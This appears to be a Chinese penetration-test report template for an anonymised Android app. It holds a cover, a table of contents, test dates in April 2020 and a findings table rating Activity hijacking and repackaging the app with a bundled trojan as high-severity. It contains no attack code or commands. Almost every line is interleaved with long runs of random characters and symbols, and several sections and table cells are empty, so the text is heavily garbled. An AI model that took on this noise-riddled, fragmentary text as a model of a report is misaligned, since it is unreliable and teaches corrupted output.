: H% W6 l0 a" S9 o& {2 p+ {
0 e: ?2 }3 O! L! A5 X, `* E n
: ^2 e6 v8 y: p, P
$ _9 G. F6 v" @; U6 p$ S% M: x ) S& O: U/ R, F0 B
Z# ]8 S) _) K# ?4 Z, U 9 k5 ^( u/ B- T: C& i+ }) t% d
/ {1 @; `, _% { K9 C; S$ T( q
- V- ^% l+ x" B% c
7 V6 A: }4 M' ^" ~& J. j- J, y : i# b( ~: W; W4 l3 n5 m
7 |" a1 G* O) A- L' X6 V/ z; }
文档编号:
' Z, H1 u% i% s9 e, X7 ?3 [1 C& A2 o% w( g: O+ I2 v9 D( K
6 P% t9 g5 o' |2 q6 p, m
/ ^7 z) M5 w6 n- Z" p # M* W1 B2 e% \5 R, F
/ Q5 u. m1 |0 h1 G
! ]/ w7 U2 `# t# p2 N7 C/ V
2 t. i5 y8 ]: R1 Y5 o' ~ 5 R, h1 m0 _ k: ^( G1 I$ p' {7 O5 W
3 F o. S v0 f4 a. x* M
0 y; W1 n1 @& |1 z r) [
5 J5 b) ~; t* t$ q Y) e
* J0 z, w8 q/ U7 e+ k
* q) E' S8 ?+ K6 `
o' u- E4 C3 M! Q
E2 x8 l7 }- B u% I , } u" Y% C" u! @. V, u( q
2 G i, k& W2 f
+ Y! U" A4 Z; J) P4 K& C( R
/ ?4 H S6 C g. t0 c0 G
% L. k5 l, {) w+ |: J" t, E4 Z4 |% r4 b
: T5 b/ u. ~- N6 i+ k: j) ^( o) m E) N
. T; h3 ~7 _( k: r" w% P8 ]! R
4 i- O9 p U7 p! r' s1 O , K1 P" ~5 a w) u6 A
& F0 u' N6 w* q9 u$ u# C
4 ?$ y9 S/ l/ I f* A3 a7 d8 y4 \2 T& S" }# \
3 k' m6 d4 ]8 Z# m0 K7 u. r
1 C# L& Y' q) o; Z' M" T 5 }7 N9 r8 F0 e/ R9 s# _0 p
# `# `' N9 L$ Y! J7 r
1 E! I D9 @' N
) B# K2 Q1 n& X: w- k/ w 某某某APP渗透测试
7 w' ?$ G C% f# A: t
( K& K2 o T" [. T# h ( J5 t1 j2 ^' R, T b" i* ?; W
2 e) g& ~! k# V& M" X4 S
# f$ w; [/ f# |6 u) K0 }+ d& C4 @
7 M' I o% L! H( `; b / ^ n# ?4 V' u. `& i4 [2 m
4 Q E4 p0 V4 E& n# a6 R0 _$ w $ h; j6 p) j% r1 x2 N- q9 q: i
: z3 b1 H; e5 O' C 9 c4 w& m. |. S# |( N( r- z1 J
1 T. M1 [' d- m3 t6 Z
/ g0 C8 D- p4 L2 E6 b& i- W( K
: @8 E! n3 a ^) B# ~4 g
2 x8 \' A+ {' {6 ~2 U% B3 g' |, F/ V) n5 y
4 F7 K: _. X7 n* Y/ ^! h
# k; M0 w: [+ w3 K9 w! G+ Q' i
/ q n5 c# ^9 v8 A2 }( }' {2 P% ?7 E& g3 r& V! l' s. j
/ E u0 Y3 }. `( P& s9 V2 C+ |
- W/ q; D0 H) j# n; m
- L+ Z& o- T5 F" Q1 _; U5 F( L0 V
4 A2 e- |. a* \* o$ ?, S4 Z
. @0 G. N7 `" s) H0 {/ z2 S
* F. T3 x# [ U! d' ^5 q% ` ' b& s) W' [) ]4 k# z; G, K) s
9 D7 V) Q0 `1 r2 D
* r! f9 W B1 _3 {9 x) n/ M- ?6 D% }; N0 C0 K. X4 ?
技 术 报 告 6 e Y$ ~. z; B: |7 ~1 _4 d
8 C6 v+ G% @1 }. j ( c7 h2 F) Y/ @) K D. v
' _" I! C) P) H 1 _4 Z+ L, H0 ^8 b( V
. t) V- f' @* Y# E* N9 A, ~+ y 5 L1 N) \: J* {& Q* l1 V
; L5 n" F* R5 D' f
0 Q9 i) K$ h$ }" O) K1 T) Z; ~8 e: b& F
- U* n. L9 J# R9 [) F/ E+ O4 O- t) z) }* A+ \
; e- b0 K' P' A8 y: S( x/ a5 ~
% l9 `8 c5 R& @. r+ X, y 1 M& p2 _7 {) s$ m
$ x) @& [8 m9 h( H9 K % d7 J/ U }! |6 b1 Q# \
- l" x6 V! @* f) M4 e( L. v: g
! u3 @1 ~, b+ q% o2 K, N, m! N* d
( S7 p0 V# G7 v7 ~
. c1 `+ G- n# i, d8 k0 d9 V
V4 G$ X1 ?9 d# s4 q9 N* v ! f) n/ ^* f7 C }+ [: w$ Y; H/ ~
1 x: M9 z/ f9 Q5 c4 ]4 o3 v % l& L$ a+ q, ^ F; w& `6 C
$ p5 _9 U4 f8 i8 }8 C- R
& i' B# p! R! f3 V9 h) H$ K1 Y: y$ k
8 U4 M$ j G5 M; k6 m) X4 _ 7 ]) n: _9 z3 p8 f! X
( ~/ o4 s6 M+ `# N* U+ ^; D$ H
4 _: d$ s+ T' e2 r, s) O# L# y! ^
2 e* G5 f3 f4 A' l0 C, D $ J, h. N1 R. h; G: f9 a
6 d+ r# I" m3 Z Y6 e2 }
1 X9 r/ a- v. l' q/ `
8 z) _ H* n2 E* ]% v" S- m
" E: K0 F- \% f0 V5 R1 F4 w# W' z
3 b* W/ H2 N7 a4 ~7 ?0 E
; p4 ~( G! I8 }% d* r1 L1 J3 n1 p- g; }! J1 F. B! w' f
" D# W( v9 M: d2 v
, }/ }/ N& ^! o+ u1 s2 V8 ?
; P( J8 a2 ?2 F, B" s6 K, `
0 p) o6 e# d9 K1 h S9 W " _- U3 S/ F3 v/ a' R& q
# ^5 J+ C! c" m6 {$ G# s
8 R/ ?$ y0 C& r; T
- x P7 f2 r, O
3 L; E4 j& k* Z$ G$ p9 F3 L
\& N; g: H. X4 q0 V
) H9 v* f( \' I3 i9 G3 z6 M' g3 y9 O1 A3 Y
; @8 ~2 B+ c* p5 O- o. q- T* n, D1 q# j7 b4 t" M
7 U: |; g% o' o8 k& V4 E
7 ^! Q$ M. m. v , f+ a+ h$ Y& _* k+ m) _+ d5 z
. O% W( B: N, @7 _7 t. W* N0 d
1 d2 }$ `6 N5 R7 c! U0 L2 d' b v& H6 D C) r
0 q& i' R, _2 S( f
U1 i4 b" [& C2 @1 K* Y0 O
: k/ p9 O4 z) k& @; h& W
+ `& z- b ~* U) ]# o# W3 g
1 M; K0 J0 E. L" s n
4 x. l" E' _9 v5 k3 _- T1 ` 6 \3 U+ Z/ R1 \2 R% h
/ @& d1 s J# u- n" }9 N; p+ k5 x + v" |. S' g% }
) r3 j& R( W3 A# @ # X% t Z; Y' Y9 C1 x
* m9 y4 `& D. c" u ~( z 0 ^, X" E' w8 d
0 n$ I* I; y0 q: A4 p
# ?8 @7 q% g8 x8 P# [
8 O9 x }6 B+ ?* _& N 4 c3 I( v( U ?5 E6 R6 e' D' [: w
- I7 E' H: D5 | b1 B
& F+ V/ r1 Y/ U, W! }) _6 `$ ? |+ U* P" `4 @7 X1 U
4 k5 r2 X" r; T1 o
# ]# [5 L, l: j( D' |" V 5 @* G0 d5 _# ?8 U' B7 z$ `2 o
7 E+ |: b4 u! P8 C/ \% \
- E8 F7 |, G( t
7 V. Y/ j; Z V5 u+ ]2 t ) T; s9 v7 b" E, x5 y4 V
2 @' \2 H2 w t! A* G# r / o2 X+ g( `9 R2 Q$ H* k( r
/ _0 L, Z" Q4 P6 d* p
/ K0 |# _1 W, z
7 G8 ^, m+ Y5 K) w 5 l- U# ~& i+ e: L
' ^1 c5 r# G8 n7 x$ X! Q7 `) v
`; F+ m- O2 Z. ~. H) }( h
/ f7 m9 y7 A, A6 ]8 m- q6 a) t + e6 `! V5 b0 Y& C; W; L! b
2 Z+ T0 V2 q3 G$ ~. m- l
4 ]5 Q; }3 s/ |3 v- y8 X% T6 ], |
; Y6 ~; O, `. H& s
* P+ e& f J! f. l0 E( y
7 h/ t( j! O. g& n# R ~ + u* P8 }/ G& n& G# T! \. c
& @4 E* b. W+ R+ {' } & h4 F! N! f& Q8 A* Y; v
/ B( `8 ]8 P7 ^6 d6 P; z
5 u) p# M1 ^7 [/ M0 n) ?0 {# ~
% W" [2 c' n5 J) M# R
" j: o) a; G( _3 X) ?+ B/ _ {4 ?+ s
) j/ q( n7 D1 P% g4 }
: ? f* U. b5 Z- ?! p5 s, q- H! r: D* Q
, B6 r7 k6 V0 E: G/ b
}; T% w; N8 ^0 T _ 二〇二〇年 " Z8 c4 r# L8 l/ A' L
: Y- {# k1 c/ M$ j 6 t0 o2 c) f# A& C/ u
# ]0 s3 ^% d$ X* J# B+ S
! e8 @3 B) u( b. w( h
! ^3 w3 ~! h( R; z
! }+ f+ b6 K" G! d
5 K: B- P! t* u, x7 E " R/ P' A& d1 _. V, G/ u; h3 @
* i. C3 Y" b3 A3 E9 T+ |- s N
7 U& Y o/ J$ v/ Q( Z9 L; F% V5 G0 c6 W! }5 i
( s# m9 U: y3 ^8 `0 S, L0 e( z5 H; c( g' r, B0 ?
% f; C! N' `' J9 f% _ N
9 P0 G- p: x) {2 p8 |+ @7 F 9 \, m4 @$ _2 C' r7 R7 x% ?+ E
/ I; |" R9 q, a% O( a; @ 9 A0 T+ ]0 w5 P5 ^: @
e7 ~) b6 ^' X& n" V0 Q7 k. {9 o
8 L- s$ k6 ^5 y/ @ X3 |# N$ V9 z* _& h: h% g
目 录 & \2 p7 r7 k2 b5 L8 i8 ^
1 u% K! J, f- b' [) ^2 n3 t- R
/ S" X2 q2 ^* h! q
2 x* t' {1 h# W+ r* w
9 j. N. k: X6 K. s3 `" i0 Y" X( E& ?1 V
8 z+ K1 j) w. P6 K. w! `- d3 C9 j+ g7 b, C: f
; B, V( N7 E4 o2 T7 u
C o4 \0 u4 i" p2 @ " W7 a5 T5 V# i+ T
. z! B# \+ k5 A 8 k$ H% A) P& m; F( A
0 e7 ?0 R: ~/ ~
1 概述... 3
% [2 ^# }4 w3 {+ k3 n3 W% d4 N G/ r1 R* i
6 r# I/ U# r( F# `0 k% ^3 p) J" r" y) ~, e% g4 q
/ E& {7 v% f! C0 t! p
! o3 m, U% [* `- | 1.2测试时间... 3 8 N; p/ ]# ^& r8 X5 S4 ^
/ |$ p3 |5 p8 a! v$ Y
+ d: V0 k0 H8 n! `1 G/ |0 t4 `9 z3 j$ k6 Y6 _
, I7 [7 w4 A- y8 B. y( Z* h4 A" m6 f. v# _, ` F" e
1.3测试对象... 3 0 W: G0 Z0 }/ {- h" A% r
$ i8 l! t' ]1 U. U3 h/ o% y% i- T2 H / Y; M3 X) f' S$ x+ _0 Q
$ ]- w- ~) _9 f/ x3 u/ D0 t- M
# k/ l+ {) v1 d2 A7 Y& [* ^/ X# h! S1 ~5 O5 u: m% U( y
1.4测试结果... 3
7 i2 i$ H2 k2 o. }: |, Q; Q% Z+ S# b7 U
; C4 [. K& A; ^ }; B6 K- P8 r1 o) [; [: c5 j% D8 ~$ Z
% n* G1 f+ t8 X2 f" S5 b+ H+ j
# ~) c1 g# D H, ^& }1 c 2 检测结果... 4 ' X' B7 }) O1 C2 t+ o* A
: o7 T/ L" }( p' ^2 R5 V; N + G" S# N" f( _" K. B
9 A5 [' J0 z$ g+ T# K% J, F% K
G- l* ^- J. O/ d4 l
K3 y5 n9 U- C I6 {; ] 2.1 某某某... 4
) K6 a Q h# f7 O" f" A# q, O* i+ H% @, ?9 a+ w5 Q
# D0 L& H' f6 o0 N7 J
) j8 e2 H4 N. v+ a& ]# ~) }" B
6 p4 w2 y/ f! t1 t) O+ Q u
1 {. h. f4 e% g! f {: v) B% L1 g 2.1.1检测目标... 4
3 L5 Z1 @& e, V# i5 k4 e, @* T! N) L8 {
3 ?1 h0 M( r0 p9 N! |
4 O2 w; M/ g) Z2 h
4 ^; x- M( S. z; t( G0 ?5 U& R' @$ B( m. S3 {
2.1.2检测结果... 4
5 c' n+ ] M) B0 D0 u9 \' k' H# s) }' M D' u# _
# X/ _5 d' ]) N$ W0 T7 ?+ N/ T2 h! e {
7 s8 M# a' Y5 ~) ^! ~9 D/ {0 ?, }5 H& w1 A+ V9 Y
2.1.2.1. 4 $ |/ M, k# G' ^0 k- m7 C9 t4 a" V7 Z
" B( B6 H) ^, m& q4 M * f" A% h6 d( _5 h4 y/ p
* N- n9 A, y8 {; k7 T# ^* p5 R
- U) E+ ]7 |/ z( U* A0 W( w3 B p/ j) G! X. f
2.1.2.2. 6
, m- w' m# E* s! z- U: ~: n- ]) r
f9 \1 y& {$ e& e. T 6 Y% W, X8 b' p6 _: M
& T+ k* m* \$ g. y: O
; D& x2 U6 A. }$ \; X# L& P6 V" y6 H
& d' l# L6 {5 a
* s& g& [$ e, z2 @) a
9 L2 q4 t0 L; a- p- r
]: c, f; K. s" B* N
! k& u: J- R% w F- v
4 E9 z- @ t8 Z5 `2 u % P0 C. O' r5 a* Y% R" D
% r. @) z& m2 t, m- {
( _( E7 ]; L& j8 o/ I ~, j
5 j2 o1 e- v! w
% q% k" P/ r1 _ l# [0 W2 D. N0 H* i$ N5 Q, p$ h( f
. f( ~, i# }6 u( o7 V
( e5 ]8 ~" Z; r/ b+ @( x, L 1 概述 - D* u0 m7 e5 \' [. Q
3 S9 b' K" ^/ t ' v7 ?4 J9 N/ l1 O! s0 E5 N+ Y
P: C7 s8 z! f0 l0 f9 B
& A0 a& O) U' e0 }, y0 k7 ?. j3 S7 g1 c3 k- l* V7 f
1.2测试时间 7 P# d. r5 r3 K5 @+ p
4 V6 A6 K; {3 i& y6 w
) [ T$ }4 r! u5 y. e. Z" x5 b% J1 e9 x
5 F: [' z, v1 H3 ^
% d2 F6 H0 b( B7 W R; Y
! R/ b0 ? p' G+ L& r1 ^0 s# Q+ o& c
! m9 {6 e! @0 x5 D( a
x; U' j4 x4 X0 k3 K& _ ) L8 b* m1 L# o" H1 X6 p
# q* V5 X4 y0 d4 V6 l : S: p6 r6 |% B
; z+ a) `! ]$ ^0 T" v
渗透测试时间
P, s+ @/ N0 O
6 K5 n% Q5 v& u& g& _) u- W/ n n+ l2 f, X! r$ `# h( _* H5 O
. g9 S% h9 b8 V) C$ X6 Z4 q! ?
|
2 G9 t. ]- `& }1 b. V2 m4 |' o2 U+ r( I& R. w2 U5 [& b
9 E; t! n/ y* N0 ^! r& @+ N! l9 i' A5 V" p4 p
5 s& V- f& j) T; X% Y- e- j4 e% M
( c5 ~3 K- Z$ U- K
M( z6 D. C8 D" E
' l3 N `0 R* S4 c5 j- d! } " d( n, e8 n7 U6 ~, T4 ^
& b8 r8 v" v2 q: o 起始时间
! d1 G+ l) h6 b; d8 b! I. y0 u$ x* J8 P9 V
' [7 Q5 [% E' n4 i
# U$ G: ?) J4 [* I" g3 R3 q |
2 i! s' D" K7 f* [
% a+ i5 R1 r9 n* Y* K5 c3 ^: _
3 U$ p5 \/ U% y4 P) {. A6 Y( A& ^1 b, ^* m* H( A4 k# N
. X4 n* U% }+ B" V% L5 @) u
& b h. z' j+ t5 h6 u& x3 e 2020年4月6日
9 Z' B U1 u9 B* O: O
% p" D9 A+ p9 |( m8 G9 x, ^
9 \' m& ^6 n% E, i
1 j2 d4 ^' D7 W# Y7 v6 h9 C |
A" M6 M' i0 j- ~9 N0 }) ?2 l* ?7 ^/ ?+ _
5 m+ g* V/ v M3 D8 j e
- A- y7 F' b) m3 m! f0 a$ i& M ' W4 W) q' O3 ^4 X& _6 G( e$ m( `# I
- u# B1 H, O' M) e
% t( l; I0 c) W/ [) C
( G& u# v3 w8 ]2 Y1 @
8 H2 r# l2 `# Q! Y2 @# W
7 U2 A* F! _+ k4 p% s1 u 结束时间 2 o/ u4 I* @3 N
3 E% G$ x8 e. j
) ?6 w6 V$ l" o) D1 b3 K
5 ]: T1 L Q' X/ L; Q
|
; Z6 e# `1 ~3 r% R. Y6 A
# d! a1 L* y9 {+ a9 u& c; X6 R
6 |" e' d4 }9 k, O8 `) q+ h7 m0 x$ p. e. a. Y' Z. [
6 w# Y" C5 ~7 C1 g. X, J' _# I
9 u, p- x9 v8 U& b: F4 R
2020年4月9日 - K& U) ^) s8 ~% i
, n+ L$ E% K5 W& Z 7 ]# b' P' \, L: Z9 B
% o+ S5 S3 x, \% h9 L
|
9 j- d5 U) b& D' W0 ]/ {! G" \
1 }. A4 j5 C& T$ M0 _ {2 U3 r & x2 z: F% k; Z
9 D' `, i# D0 E( L4 H o
3 f, ]1 s& \) @
* V$ |. X9 K, T0 j$ h & J+ M t3 _4 P) y, @
1 @4 A; X) m4 Q' @6 p" x/ q6 L
& N' A" F: p" d& ?! v0 Y/ d
$ x; N- m' F1 h' ?5 [ 1.3测试对象 ) b: o/ Y/ B0 l k x/ c; q; N
, w1 o' D0 J% p0 [ + m7 X8 m% f6 L
% S/ h; `7 I' j) e+ g; l3 Q& @
4 Q( n, `" a0 ]9 v
$ ^1 J4 W7 _8 Z
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / K# }5 e/ M- F# y& a& ?% c
% k: `# b0 J$ Q' B4 _9 V. c! o , V* G0 e! R0 a& Y" Z% ^& J3 Z5 I
) S7 J( D5 `, }; P3 ^' V + W" k0 @$ V7 F9 ~* |
2 ~& h+ \$ o' m2 _, K 表1-1 检测对象
( ]3 S3 S+ A$ x7 e) r" I c5 Z% H8 k
' A( \! w8 m6 U5 }+ \
! \* |6 o$ n: `) x9 S ' O5 T8 J: T7 [6 b
- h) d% w# }! l. g) J! O
* C# i {3 z( y6 g6 `3 o1 E$ ]6 h0 d
! ~ _ w: X- ~! b
- i7 N3 X- ?. L' J / F$ s p1 l9 D& s
+ u. X" d: O% Y, @0 W" @" l0 V" v! l7 J
0 z" D9 ^2 p) m. q- j; T
. n7 c5 o* q: y( Z 序号 4 m5 {/ \2 b2 y; |7 S% k6 ^9 k4 L
" J& n+ V4 G0 N! D9 J
. W- h$ b: d j* V0 o! \+ a; K$ `% ~ Z4 t
' c7 U, ?$ U# V! H" s | 8 b; ^+ V) y% H ?
' n' {' ^# G* m9 G% F: _
. P$ _+ ~/ Y5 q3 E3 n: h( ~& K. l" m2 U+ Z/ W2 n9 z, t3 Y8 s
+ |' E8 F7 k* d8 i! t# }, S2 {- \: B4 W. @( y" j+ b; r. M4 l
测试对象
U: u! q% z' n% d S: z( x) o: ~
" A/ y5 ~8 J3 }2 `1 h; t ' y5 _5 K' c1 k' q6 p4 q. U1 d
# n' J$ ? e( g# V5 l# P/ L3 r
| : c/ r) n" i, Y( D7 d
" i: a$ i7 c4 k
. m" c6 w+ _3 t+ E& M! t% e. W: F" b1 k/ F! G: J
+ x/ ` W0 H; ? B ?9 r2 E3 \4 J* r b5 U
测试地址
- Z3 w4 y- [" G1 H
+ }2 E, h! F3 ^
! |5 \2 N( ~+ {- B. Z9 w+ H" Y; S
" N& H9 C( Y! X1 b9 J8 w, \ | 1 P" j2 i" Y, q* M$ T
5 l, x8 U& _+ h+ Y$ g7 b9 I9 D6 Q
. J( I4 L7 S2 z, u6 M$ r# f- P+ A2 v- i
" Z3 Q& C3 m' U
N/ K" m8 q# {7 F; e 安全漏洞
2 Q& ~3 E3 f3 H: [/ i g
a& K9 `+ s* z& i/ L " N5 u( S/ ^0 L0 B/ F/ p6 z
$ X; c0 j. `; w1 j4 J# O
|
* ~5 F# o8 M& s$ T, _7 t/ S9 w5 k$ X. d* U) x' C
- y0 c* Y' |, \( F3 n7 N" r
9 Z: F6 P! W* R3 v. J/ e/ V- q" _ - g4 _: }, s* V `+ Y# K: Q+ g0 l1 G, h4 k
+ Y3 i$ e# P# e' H N
% n4 H( }9 ~- Z; n% M* z$ f6 l. l8 T
& ^+ p3 E" p& o; s: ~' U2 I( Q6 o2 ]) A' r6 v: E% Y; n
1 : Y' f( T$ z1 O5 K
6 u3 v% P; R n- _
C c, H8 v& P9 [3 r9 R" {, F( Q- T* I
| / q8 H& s- J; I
6 F/ I' u* S2 i
/ r6 ^. a. m" Y( V) h7 @& ^# |% B1 J& l7 F8 | B
/ r$ R& I+ k- `. J& h, e4 b$ N3 R i$ @6 N
某某某安卓APP & F* b' d) F) I3 Z4 e
: h5 [9 s0 N4 j! @& C' i
7 ]. c. W: K+ _' j. m: t9 L
& o+ O* K* \& l1 |# A E; z
|
5 L6 d9 ^' A, j4 o7 l0 L- p9 l
1 B) w% Q5 T+ E5 v2 B' D ; Q- o+ @: {" y2 n: o
: H* L+ K* [+ ]1 | ' S; {* i, f7 e
! L k8 Y, U# G' P4 ? ( L# F: \4 Z9 w3 k* S
, U! L5 I0 Z) T/ e. h
% h. \; K( {) B) b- `8 p
\$ d7 }* E1 b% j7 _4 j2 W
|
4 f; |4 ~; z; G+ d7 ~4 H# M, ~
, A' V9 `, }0 `: a% J! p3 } 4 E E& l% A. Y- z1 P$ X
8 T+ h# ~% v, p( @; S
8 W# `+ V5 F. M& @2 f: s6 n4 [2 ~3 F; j& c
2
8 e7 S% Q, j. Q2 t
; ^4 ^8 F, {" L/ O# o' n- l
% e* x/ l, _ S, o4 q! Q* N' H* D* } B7 h. _" d8 Y
|
6 z7 j3 P6 O( Y# k4 C2 w2 j4 w* a1 \
+ t! a1 c- H; u. N, a, {# T
) P$ }7 T0 s- b( m0 E7 n
& R8 B9 x$ K" _$ ~: d+ h
. E$ l1 a) a/ J3 M2 D, Q - b1 h: K1 D4 R" R" y
/ a, z. W8 Z% z+ @' h; S
6 y- f- S ?4 h. X0 a2 L3 K
3 ~- `. C1 M6 k 1.4测试结果
' y& G1 ^+ }. T8 S
/ Z) u. D1 o+ N, u4 W 6 T; r# c/ Z3 e) v0 S( O' y
) K+ Z# J/ x3 l1 V( U3 W- J* [8 W
) v& H% L: V' f2 d; H) D4 \9 R' J/ a# H r$ Q! g$ ]
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 5 \5 g' j Z0 ?2 i2 Q+ M; @
+ _' M+ W0 w! u+ b/ r. C+ r 7 w: {2 h9 P3 \( S1 D. c* o: i& N. }
* _* o# |& X, G6 s% Q+ n! w- l/ k
" c1 _& A5 r% \
9 |+ X: R. t/ s" }
* f+ S# L* \2 `' S6 E6 s' D& ?+ I1 o0 A6 ~4 s
) [( \7 O9 P4 D4 h
5 |8 Q$ |, M2 b0 k/ w8 P& A' m
2 B3 z! u9 ?9 z. W
( u; y& u9 X2 N, N/ Y 9 q7 \- e' [& {* E
& I; P( x$ F4 [ 7 ?: W6 M1 v4 T# d9 B- H4 v
' a& g- k X4 R j6 d9 M, q% n! ~" Z
1 h/ D# U- s% L/ N1 @% x2 _3 Q
' K% A% x6 X$ h
* o: `% w# N2 H5 D( l1 A 2 S! ?8 }8 {' u
1 t1 h S& g4 a9 C }, c4 H 序号 . ^% x9 |$ }; Z/ a1 l" e
) Q& k$ O4 W r5 e5 q
9 }2 i/ A8 |3 X/ z; T+ ^
Q9 y2 h7 U0 f1 G# V$ w; A- M5 `- B
|
" k9 O) u) A) D$ j1 c4 l3 a" d9 A8 j
* Q. G( Y. x4 a f" d0 ~; k0 R5 Z! w, D: O2 _- }# ?4 X3 H5 w
: t- \9 \8 N0 O9 i4 u3 R* m
4 g) H- \1 L7 a6 _
系统名称 ' n5 p1 _- g. \. s
1 j# `2 O u# M) Z: {( ?
9 t6 L: a' h' [3 U" t
6 q6 d$ v I- }% s8 q |
7 Z M. e/ j( s' L* {" I+ h( L1 N( [
, n3 N8 `# }; s7 h # L4 i( R+ i9 i" B
6 g/ s9 z& h: i$ y; w. I 7 {3 z2 d+ h% i: N6 E& F5 V
. W( N7 _( z2 p2 ^; Y' P" U5 j 漏洞名称
* ^% l0 W& s+ X9 Z+ R3 u3 O; Z
. Z: v7 V9 v$ ~; i! b 9 d# s( J) I- l0 X: T
' j3 [0 y, h1 t: _
|
) M R* W: l5 `" @/ [! i8 j
. K+ V8 g$ e/ n8 D/ V9 d 1 x: _6 @: a. ?) t5 R( h! |( q+ r
$ D! f, U8 a. D1 q$ L/ N
: i$ D$ v" h$ a# E4 G
y3 ^7 \. ^! H& z+ B2 K" W 漏洞危害 . }" ?: M) ]" R# g
' a; r$ o5 g' ?9 a, M5 P$ ]
+ K( T) g Z, j- Z3 |9 Q N! E+ a' V
| % s, ], [& p" R- |: W
& s, L- _- t3 x
5 ]1 q, s! j- ?' q1 c j& U5 s7 ?4 b: Z8 m
& Y4 c T" a4 h: ~( O2 w5 A$ P$ D0 X
修复结果
+ w! ?0 r; y: G( }. A
3 b) n% n9 P F& I$ G& L , j# \7 ~. @0 ^) d: _
8 C* U9 M6 Y6 ?! O2 ?
|
! B6 h" w7 y7 N ~% y2 A% c6 Q$ M, t, a5 k
0 d6 X m/ n& x6 E8 e8 l( w* Z( E4 d9 ?
# Y, o6 O7 `# \& |, T' n* n
. n* t3 U) s6 C; j, S. `
- N, ^5 @0 _6 ]1 f$ k9 q
& W) {- _7 T) X! Y& U3 U
) p: M- S1 D# d, m/ L
2 s% N" _4 n4 E 1
7 M$ A! a' V6 {+ {# B5 K) u2 Q; W$ u. h( T6 ~
/ j) T( R9 m" J; s: Y2 @
6 c$ M" ]# F( D/ L- } | 6 K$ J& l' E' ^
2 n U- _$ a/ p: u2 }. g q
8 Q2 \1 ~: x6 i+ j9 G. w
+ s q P1 V' d+ E3 B" A
3 D1 C/ O7 D3 g4 I% {, ] A( ^$ t
某某某某某某APP
3 s$ G2 ]4 u0 d. J
8 v( Z* s) l8 B0 k' d1 X( U5 w
* l5 [( U4 p: p& W; F
* L/ i1 ^! C2 E, W | 0 p0 O$ |. _0 Y
+ W1 m5 f6 y$ j" b+ K
2 `. ^5 n' e& n5 [0 \7 z& D* V7 n9 w: A
9 k' r9 Q1 F$ I3 E( G/ |& n* ~+ t- ^# a& w
Activity 劫持
/ ~1 |0 d) [$ b6 B% H( ?1 H4 O* s
. |2 s0 k8 D, [( L$ B. {. | 5 d. H* f* `. A9 U% v
- y! z4 o& ^) b, R . l+ n$ Q. }( s2 A
n! B) a% g- N9 i
9 R% T* ~ ?* A! z5 B9 ~$ ~+ \
' ]' P# ~, k: Z6 q& @ 5 | _( V" L4 q I/ \5 E2 D
8 e+ R! R5 Y5 H y, o/ G# ?9 Y | ' }: ?, _, Q% ?) c1 @0 U
6 x8 B* B* x3 p) \0 L: o. W0 ^
1 d, S J$ |& z3 x+ R; c. M
0 X; c* i5 K: h) K( W
' }! O4 t" |* @% b S8 i3 W s0 \& {' `, g) Q* g
高 . N: {; k; a' |: r$ y
0 Y" h9 }& s2 s: ~2 _
) j4 r5 r' Y! F7 f1 E. p4 o' W: r- ~
$ R2 v! F" q. N! p, ~+ |( j2 ~ | 2 A6 r% |, u1 T* j
) m% M8 Q" \3 v) z! o; t3 J
8 D; G1 `8 f' m$ ?
$ M% R/ f5 O/ v6 ]- x! x0 k3 l 8 \6 j+ E% D" d# h; E
6 o" l3 v- j6 o" b0 S+ l& w
$ u" [' ~; q1 G. ]# b$ ~( v
5 u# L: C2 c) F+ j
) |8 K$ o5 A ~9 l: H7 j% C
$ `& V9 x6 d) p$ L ]3 a- P | ( _3 }- _( e9 b, Y! h
6 W& {$ O# D# S) X # a5 M C- [- \( p
9 R9 H( m7 A. h, b
a" ? _% Y/ J9 M' R) d2 j) l, ~# W" \: I
4 X, Y% ~: j" s9 x# O, f4 n' x u; O0 ~- J$ L2 x- p
0 s9 s) s6 n; l6 y. v9 X! o. r
# _4 f( u. s, q; b3 }- O- c
2
Z* U* f" s# a% h2 X1 o9 n& ^
, p) |& T0 M1 c x
# k* |7 P- H. Q1 L% H' q
, p5 q, m/ T1 E( ^3 z. v |
- e+ x. T5 R1 i$ |6 I J( {6 d% w/ T2 w: E; Z1 T
) U5 W" @1 N! X/ X {$ w) r! h, p' d
9 e1 o7 u; e- v6 ^8 x$ R5 Z
5 r- t% t) B6 M' W/ {0 F
某某某某某某APP - r w" b$ D) ]" y6 i. O# H+ X' q
& b6 h% }1 t( z4 [+ m
* v- }7 Z% b# x2 Z- X3 V
3 m2 E2 [. e" T. b4 a1 L, N4 e) H* D | " D, ~; O7 ]0 a- H' d, b
, ?1 \7 _8 t" A! [7 p# ~& L5 \5 X
! l% u' u5 w; K+ U& l) m% A, U0 m9 d& Z; X
, ?: W; O& p. q: l4 y v
" _8 B8 d& G. d6 l3 _ 反编译二次打包捆绑木马、篡改APP代码
* W @# w( h3 g( Y2 \9 f) q- p
7 p D! }: L! w
3 Q5 Z# }" ~: k# N5 a# |
, [) W1 U2 u; D+ f | . V, j3 _; B% x* @+ ?5 s
6 E% n0 j6 d" x# Q$ o2 z( x & i' R( Z {1 y/ p( D; F) ~1 r" N
1 Y- _7 P0 n5 @- v
+ L* s$ I: P8 r% ?0 X
. Q# ^$ a! p4 V: H7 z8 e 高 , K* b- k. G" |
4 M- |) v# Z1 `8 K' E! I" @
( c4 m9 O, C, g$ c5 W
9 q0 P3 m) C4 a | 0 l2 |7 C R% o6 \' M. V6 I
7 f5 S* o2 z6 U0 ~+ M
) N4 e$ M2 V: s; G: W! s/ I
5 G6 ~9 S$ Q/ S+ B
4 @1 {; \2 N [0 v3 b; r5 t; u. G o6 ~$ R; w
" S5 x1 h" d- @8 R& K2 F
/ n/ l5 ]. L7 \, L3 D % i4 [7 A0 ?( c: u# ?2 E" I5 n5 K
5 m9 T: D4 c8 J: e9 H | 3 D* N1 t1 k: T% K3 l6 p/ j( C
8 q' e* e' p# _1 `* E9 M( J
9 Q0 r9 i4 U/ N% W* ^
1 @) B5 O) X! ^) y' U
7 e$ G* Y5 l+ v% N/ F( _3 e
0 s( ]- o; \% D: m3 e
! l7 w- p, W+ ~: H$ X* V7 a. t" s* M8 B+ v$ X' j7 A2 a
. q, T9 C6 g$ Q; j) ]- f
8 \, k; A* D& _/ Q# |# a. |% {
. K; s; B8 s) n( _* V: c3 H& f3 {$ L, M1 c7 ], Q- _
5 \8 ^. G# a5 Q1 B5 k
2 h7 I( \8 @& [. B: i' v
4 t# l m5 |) S/ m- M/ K' S& O1 b4 O" n8 f: S
) P' u, b3 {7 Q) [; D/ {4 ?
